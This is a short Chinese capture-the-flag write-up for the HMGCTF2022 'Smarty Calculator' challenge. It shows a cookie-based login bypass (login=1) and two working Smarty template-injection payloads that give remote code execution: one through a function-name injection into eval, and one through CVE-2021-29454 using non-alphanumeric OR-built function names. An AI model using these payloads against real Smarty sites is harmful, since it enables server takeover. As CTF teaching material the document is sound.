【HMGCTF2022】Smarty Calculator

首先尝试输入数值，发现要求登录

cookie构造login=1成功登录

根据题目提示，Smarty为web框架，搜索相关漏洞

解法1：

data={function name='exp(){};eval($_GET[1]);function

'}{/function}

URL编码后

data=%7Bfunction%20name%3D'exp()%7B%7D%3Beval(%24_GET%5B1%5D)%3Bfunction%0A%0A'%7D%7B%2Ffunction%7D

同时GET传入?1=phpinfo();

解法2：

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-29454

https://blog.csdn.net/miuzzx/article/details/123663551

无数字字母的脚本

https://blog.csdn.net/miuzzx/article/details/109143413

payload：

data= {math equation="1;('%30%28%30%29%2e%26%2f'|'%40%40%40%40%40%40%40')();//" }

data= {math equation="1;('%30%2f%30%25%2e'|'%40%40%40%40%40')(('%23%30%00%00%26%00%00%21'|'%40%40%20%2f%40%2a%20%40'),('%32'|'%40'));//" }